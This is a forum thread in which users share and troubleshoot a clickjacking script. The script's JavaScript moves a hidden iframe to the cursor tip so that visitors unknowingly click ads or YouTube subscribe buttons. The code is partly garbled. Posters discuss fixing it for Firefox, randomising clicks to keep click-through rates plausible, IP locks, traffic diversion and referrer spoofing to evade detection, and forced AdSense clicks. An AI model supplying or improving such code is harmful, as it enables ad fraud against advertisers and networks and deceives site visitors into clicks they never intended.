How will you get the people to click on the ads/subscribe button?
How will you get the people to click on the ads/subscribe button?
| Sponsored Links |
Please read the title of the thread again.
Lol, you took it out of context.
alright I was able to get this to work by changing the coordinates some however it does not work in firefox here's the new code for internet explorer
anyone have any idea how to make it work in firefox. I think it has something to do with the top and left commands. I believe firefox uses different commands than these to find cursor position.Code:******** **** **** ********var iflag = 0; ** *var icontainer = document.getElementById('icontainer'); ** *var iframe = document.getElementById('i_frame'); ** *function mouseFollower(e){ ** * * */* * * * * * * * * * *DO NOT EDIT THIS * * * * * * * * * * * * */ ** * * *x = (!document.all)? e.pageX : event.x+document.body.scrollLeft; ** * * *y = (!document.all)? e.pageY : event.y+document.body.scrollTop; ** * * */* ------------------------------------------------------------*/ ** * * */* places the iframe at the tip of the cursor, to make it clickable */ ** * * *icontainer.style.left = (x - 1) + 'px'; ** * * *icontainer.style.top = (y - 1) + 'px'; ** *} ** *document.onmousemove = function(e) { ** *****if (iflag == 0) { ** *********mouseFollower(e); ** *****} ** *} ****
@howtomeetagirl: This script works on Firefox or at least my firefox
the problem of not working in firefox cud be related to the size of the div and iframe and their positioning with respect to mouse cursor.
one way of controlling the ctr wud be to use math random function to call the clickjacking code. I am also thinking of implementing IP lock and traffic diversion for unused clicks.
Anyone has successfully installed this without any error?
Does it create some harm?
Any feedback?
Sorry for the nube question but Im completely nube at YT stuff.
What version firefox do you have? I see lots of potential for this script, but my php is shitty and I want to know how to spoof referrer and add a random function for ctr.
This may not seem so Jr. Vip of me and I know I'm bumping sort of an older thread; but does these scripts for adsense still work? I don't mind trying it myself, but the answer to my question below is somewhat of a determining factor over whether one should risk using this script.
Is it a bad idea to use adsense force click if your traffic primarily comes from adwords?
Bookmarks